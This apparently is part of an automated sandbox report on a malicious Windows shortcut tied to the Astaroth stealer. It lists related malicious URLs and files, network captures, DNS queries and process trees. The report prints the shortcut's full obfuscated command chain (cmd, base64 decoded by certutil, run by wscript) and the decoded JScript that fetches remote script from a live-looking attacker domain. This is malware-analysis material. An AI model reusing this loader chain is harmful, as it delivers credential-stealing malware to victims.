                    • 104.16.123.96
                    http://www.y.psc4fuel.comGet hashmaliciousBrowse
                    • 104.16.123.96
                    https://rackspace-106139.weeblysite.com/Get hashmaliciousBrowse
                    • 104.16.123.96
                    Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm_Get hashmaliciousBrowse
                    • 104.16.123.96
                    Ionos.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    olgoonik_Employee-Benefits_Handbook.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    http://filereport387.4nmn.comGet hashmaliciousBrowse
                    • 104.16.123.96
                    Policy Docs.htmlGet hashmaliciousBrowse
                    • 104.16.123.96
                    http://go.skimresources.com/?id=129857X1600501&url=http://cna.jolam.com.br/aG9sbHkuY2FydGVyQGNuYS5jb20Get hashmaliciousBrowse
                    • 104.16.123.96
                    https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbxj81MOVwwquAIa9XzInGKjv9vN-Fvq8CyR1QPOgSexT7SylfX19oV4zCiTAkZBFTE/exec?r16or4p22&sa=D&source=editors&ust=1675197778836812&usg=AOvVaw3LA2q4v5qOqvPQ_WkxbwsLGet hashmaliciousBrowse
                    • 104.16.123.96
                    Secure_Messages.PDF.htmlGet hashmaliciousBrowse
                    • 104.16.123.96
                    tmp444.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    Completed Signed Agreements.htmlGet hashmaliciousBrowse
                    • 104.16.123.96
                    DFE5049756F130F2559746DA26D1A7DCE785B0099A715.exeGet hashmaliciousBrowse
                    • 104.16.123.96
                    Voicemail - 6737878.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    VoiceNote.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    http://go.staticvisit.netGet hashmaliciousBrowse
                    • 104.16.123.96
                    Shared Docs.shtmlGet hashmaliciousBrowse
                    • 104.16.123.96
                    Completed Signed Agreements.htmlGet hashmaliciousBrowse
                    • 104.16.123.96
                    No context
                    Process:C:\Windows\System32\cmd.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):117
                    Entropy (8bit):4.770111006002049
                    Encrypted:false
                    SSDEEP:3:qVRxHOhRxHUsdefYRs1iHeYYGRoAYCjM/0DNDXG7Qg9e:qtuesdeTke5clM/0DNDfEe
                    MD5:C03BC9405A710A5C7A38B9E87FAEF672
                    SHA1:7F971674862DF7DBF2F784549D1CB20FF24F32A7
                    SHA-256:765F70AC8E4DE61423A032BAD00AFDF1A7C0B3374FBF360C12EFF08E912A2D0B
                    SHA-512:4781F4CBFF2B165426CD6D4061992B256FA5449CF9C5372157A0CCD9818C0CE23A516CD0C971DFA6BC29BF0AA59A056AF9B24C225204E6763DBA6B86301F685D
                    Malicious:false
                    Reputation:low
                    Preview:var C45t="sc"+"r";D45t="ip"+"t:h";E45t="T"+"tP"+":";GetObject(C45t+D45t+E45t+"//a8eiy8.innovationsinsight.cyou/?3/");
                    File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                    Entropy (8bit):5.481100344755829
                    TrID:
                    • Windows Shortcut (20020/1) 100.00%
                    File name:gzLeH3Dmtn.lnk
                    File size:493
                    MD5:6a04cb119228b5ca8bb2fc2f4856103f
                    SHA1:2f7eb865bd303466749a66e5cee8f21962d43cd0
                    SHA256:0135bf39f5a2167cce8af04e8eaac0caee8b52123fea1a3ec2411be0a92da400
                    SHA512:3a7bbf22d8d0eaaf8244f907878da1231b9fe62caafe641db17da4c4bbdd5dd2b0308e2e17d3d77f59e72f2fe5c359a10c1f187e4d9ceb163a03233ec174a213
                    SSDEEP:12:8rflM8OBE6ZG8WgkUeX0WMjdXMLJUOmn8m7f8oi4ukxpRVIgmF:8loG8WFfXRMZMLeOg8m7fy4vIBF
                    TLSH:2EF0A34D71532D96F82E1132458B1E4B0EDCB9963F113C335A5D01C92660B087F0D174
                    File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32+.%ComSpec% /V/D/c "md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC
                    Icon Hash:00828e868e89bd0d

                    General

                    Relative Path:
                    Command Line Argument:%ComSpec% /V/D/c "md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!"
                    Icon location:
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.4188.114.96.349692802851288 02/01/23-07:21:00.942667TCP2851288ETPRO TROJAN Astaroth Stealer Activity (GET)4969280192.168.2.4188.114.96.3
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 1, 2023 07:21:00.921303034 CET4969280192.168.2.4188.114.96.3
                    Feb 1, 2023 07:21:00.941167116 CET8049692188.114.96.3192.168.2.4
                    Feb 1, 2023 07:21:00.941433907 CET4969280192.168.2.4188.114.96.3
                    Feb 1, 2023 07:21:00.942667007 CET4969280192.168.2.4188.114.96.3
                    Feb 1, 2023 07:21:00.962163925 CET8049692188.114.96.3192.168.2.4
                    Feb 1, 2023 07:21:01.123372078 CET8049692188.114.96.3192.168.2.4
                    Feb 1, 2023 07:21:01.123703957 CET4969280192.168.2.4188.114.96.3
                    Feb 1, 2023 07:21:01.172327995 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.172386885 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.172548056 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.196146011 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.196186066 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.256799936 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.257061005 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.558715105 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.558758020 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.559689045 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.559823990 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.562099934 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.562115908 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.593565941 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.593755960 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:01.593830109 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.593885899 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.596235991 CET49693443192.168.2.4104.16.123.96
                    Feb 1, 2023 07:21:01.596282959 CET44349693104.16.123.96192.168.2.4
                    Feb 1, 2023 07:21:04.803647041 CET4969280192.168.2.4188.114.96.3
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 1, 2023 07:21:00.872387886 CET5098253192.168.2.48.8.8.8
                    Feb 1, 2023 07:21:00.899540901 CET53509828.8.8.8192.168.2.4
                    Feb 1, 2023 07:21:01.147300005 CET6008053192.168.2.48.8.8.8
                    Feb 1, 2023 07:21:01.169709921 CET53600808.8.8.8192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Feb 1, 2023 07:21:00.872387886 CET192.168.2.48.8.8.80xadcaStandard query (0)a8eiy8.innovationsinsight.cyouA (IP address)IN (0x0001)false
                    Feb 1, 2023 07:21:01.147300005 CET192.168.2.48.8.8.80x2494Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Feb 1, 2023 07:21:00.899540901 CET8.8.8.8192.168.2.40xadcaNo error (0)a8eiy8.innovationsinsight.cyou188.114.96.3A (IP address)IN (0x0001)false
                    Feb 1, 2023 07:21:00.899540901 CET8.8.8.8192.168.2.40xadcaNo error (0)a8eiy8.innovationsinsight.cyou188.114.97.3A (IP address)IN (0x0001)false
                    Feb 1, 2023 07:21:01.169709921 CET8.8.8.8192.168.2.40x2494No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                    Feb 1, 2023 07:21:01.169709921 CET8.8.8.8192.168.2.40x2494No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                    • www.cloudflare.com
                    • a8eiy8.innovationsinsight.cyou
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.449693104.16.123.96443C:\Windows\System32\wscript.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.449692188.114.96.380C:\Windows\System32\wscript.exe
                    TimestampkBytes transferredDirectionData
                    Feb 1, 2023 07:21:00.942667007 CET0OUTGET /?3/ HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: a8eiy8.innovationsinsight.cyou
                    Connection: Keep-Alive
                    Feb 1, 2023 07:21:01.123372078 CET2INHTTP/1.1 302 Found
                    Date: Wed, 01 Feb 2023 06:21:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=iejtll6fcqdjkmc0fesbfk5r16; path=/
                    Set-Cookie: pais=CH; expires=Thu, 06-Jan-2028 06:21:01 GMT; Max-Age=155520000; path=/
                    Set-Cookie: estado=CFXX; expires=Thu, 06-Jan-2028 06:21:01 GMT; Max-Age=155520000; path=/
                    Set-Cookie: cidade=CFXX; expires=Thu, 06-Jan-2028 06:21:01 GMT; Max-Age=155520000; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    Access-Control-Allow-Origin: *
                    Location: https://www.cloudflare.com/cdn-cgi/error
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3Ww5MrODE%2FWFzYtcXZ2b%2FMz8VNSZy%2BS%2BLTnohbMxCNov8gOn6RJIKV6D7Iu8tkds3%2FLE5nU8kc8%2B4I%2FWeeJv9kj391CiNTt9HpQYI5tLRdKFJ%2Blqtjf2ubdRAmAoy2vLH6C9rUXSxKTWb8db28qcppQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 792895a0eb303802-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.449693104.16.123.96443C:\Windows\System32\wscript.exe
                    TimestampkBytes transferredDirectionData
                    2023-02-01 06:21:01 UTC0OUTGET /cdn-cgi/error HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Connection: Keep-Alive
                    Host: www.cloudflare.com
                    2023-02-01 06:21:01 UTC0INHTTP/1.1 404 Not Found
                    Date: Wed, 01 Feb 2023 06:21:01 GMT
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: MISS
                    Set-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
                    Server-Timing: cf-q-config;dur=4.9999998736894e-06
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnly
                    Server: cloudflare
                    CF-RAY: 792895a4c8f030db-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                    2023-02-01 06:21:01 UTC1INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:1
                    Start time:07:20:59
                    Start date:01/02/2023
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!
                    Imagebase:0x7ff632260000
                    File size:273920 bytes
                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:2
                    Start time:07:20:59
                    Start date:01/02/2023
                    Path:C:\Windows\System32\certutil.exe
                    Wow64 process (32bit):false
                    Commandline:cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
                    Imagebase:0x7ff767370000
                    File size:1557504 bytes
                    MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:3
                    Start time:07:21:00
                    Start date:01/02/2023
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
                    Imagebase:0x7ff6a0cb0000
                    File size:163840 bytes
                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    No disassembly